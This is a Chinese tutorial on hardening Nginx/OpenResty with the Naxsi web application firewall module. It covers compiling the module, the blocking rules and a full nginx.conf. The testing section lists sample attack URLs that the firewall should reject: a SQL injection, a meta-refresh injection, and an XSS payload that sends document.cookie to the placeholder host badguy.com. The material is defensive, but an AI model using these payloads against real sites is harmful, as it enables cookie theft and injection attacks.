当前位置: 首页 > 工具软件 > Naxsi > 使用案例 >

Linux搭建waf防火墙,Nginx使用Naxsi搭建Web应用防火墙(WAF),防xss、防注入

贺海
2023-12-01

一、说明

Naxsi是一个开放源代码、高效、低维护规则的Nginx web应用防火墙(Web Application Firewall)模块。Naxsi的主要目标是加固web应用程序,以抵御SQL注入、跨站脚本、跨域伪造请求、本地和远程文件包含漏洞。

官网地址:https://github.com/nbs-system/naxsi

二、下载Naxsi

cd /data0/software/

wget https://github.com/nbs-system/naxsi/archive/master.zip

mv master naxsi-master.zip

unzip naxsi-master.zip

三、重新编译nginx,加入naxsi模块

cd ngx_openresty-1.4.3.6

./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_realip_module --add-module=/data0/software/naxsi-master/naxsi_src/

gmake

gmake install

cd ../

四、拷贝Naxsi的核心配置规则库

cp /data0/software/naxsi-master/naxsi_config/naxsi_core.rules /usr/local/webserver/nginx/conf/

定义一个虚拟主机的安全规则

vi /usr/local/webserver/nginx/conf/mysite.rules

内容如下:

#LearningMode; #Enables learning mode

SecRulesEnabled;

#SecRulesDisabled;

DeniedUrl "/RequestDenied";

## check rules

CheckRule "$SQL >= 8" BLOCK;

CheckRule "$RFI >= 8" BLOCK;

CheckRule "$TRAVERSAL >= 4" BLOCK;

CheckRule "$EVADE >= 4" BLOCK;

CheckRule "$XSS >= 8" BLOCK;

编辑nginx.conf

vi /usr/local/webserver/nginx/conf/nginx.conf

在http部分加入如下配置

include /usr/local/webserver/nginx/conf/naxsi_core.rules;

完整的nginx.conf如下

user www www;

worker_processes 8;

error_log /data1/logs/nginx_error.log crit;

pid /usr/local/webserver/nginx/nginx.pid;

#Specifies the value for maximum file descriptors that can be opened by this process.

worker_rlimit_nofile 65535;

events

{

use epoll;

worker_connections 65535;

}

http

{

include mime.types;

include /usr/local/webserver/nginx/conf/naxsi_core.rules;

default_type application/octet-stream;

#charset gb2312;

server_names_hash_bucket_size 128;

client_header_buffer_size 32k;

large_client_header_buffers 4 32k;

client_max_body_size 8m;

sendfile on;

tcp_nopush on;

keepalive_timeout 60;

tcp_nodelay on;

server_tokens off;

fastcgi_connect_timeout 300;

fastcgi_send_timeout 300;

fastcgi_read_timeout 300;

fastcgi_buffer_size 64k;

fastcgi_buffers 4 64k;

fastcgi_busy_buffers_size 128k;

fastcgi_temp_file_write_size 128k;

gzip on;

gzip_min_length 1k;

gzip_buffers 4 16k;

gzip_http_version 1.0;

gzip_comp_level 2;

gzip_types text/plain application/x-javascript text/css application/xml;

gzip_vary on;

#limit_zone crawler $binary_remote_addr 10m;

log_format access '$remote_addr - $remote_user [$time_local] "$request" '

'$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '

'"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

log_format wwwlogs '$remote_addr - $remote_user [$time_local] "$request" '

'$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '

'"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

server

{

listen 80;

server_name blog.abc.com;

index index.html index.htm index.php;

root /data0/htdocs/blog;

#limit_conn crawler 20;

location ~ .*\.(php|php5)?$

{

#fastcgi_pass unix:/tmp/php-cgi.sock;

fastcgi_pass 127.0.0.1:9000;

fastcgi_index index.php;

include fcgi.conf;

}

location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$

{

expires 30d;

}

location ~ .*\.(js|css)?$

{

expires 1h;

}

access_log /data1/logs/access.log access;

}

server

{

listen 80;

server_name www.abc.com;

index index.html index.htm index.php;

root /data0/htdocs/www;

location / {

include /usr/local/webserver/nginx/conf/mysite.rules;

proxy_pass http://127.0.0.1/;

proxy_set_header Host www.abc.com;

}

location /RequestDenied {

return 403;

}

access_log /data1/logs/mysite.log wwwlogs;

error_log /data1/logs/mysite_nginx_error.log debug;

}

server

{

listen 127.0.0.1:80;

server_name www.abc.com;

index index.html index.htm index.php;

root /data0/htdocs/www;

location ~ .*\.(php|php5)?$

{

#fastcgi_pass unix:/tmp/php-cgi.sock;

fastcgi_pass 127.0.0.1:9000;

fastcgi_index index.php;

include fcgi.conf;

}

access_log /data1/logs/wwwlogs.log wwwlogs;

}

server

{

listen 80;

server_name status.blog.abc.com;

location / {

stub_status on;

access_log off;

}

}

}

五、启动nginx

killall -9 nginx

/usr/local/webserver/nginx/sbin/nginx

六、测试

http://www.abc.com/test.php?name=40/**/and/**/1=1 不通过,含有条件注入

http://www.abc.com/test.php?name=%28%29 不通过,特殊字符

http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E 不通过,参数内容含脚本注入

http://www.abc.com/test.php?title=meta%20http-equiv=%22refresh%22%20content=%220;%22 不通过

可以到/data1/logs/mysite_nginx_error.log查看naxsi过滤的请求

赞赏

 类似资料: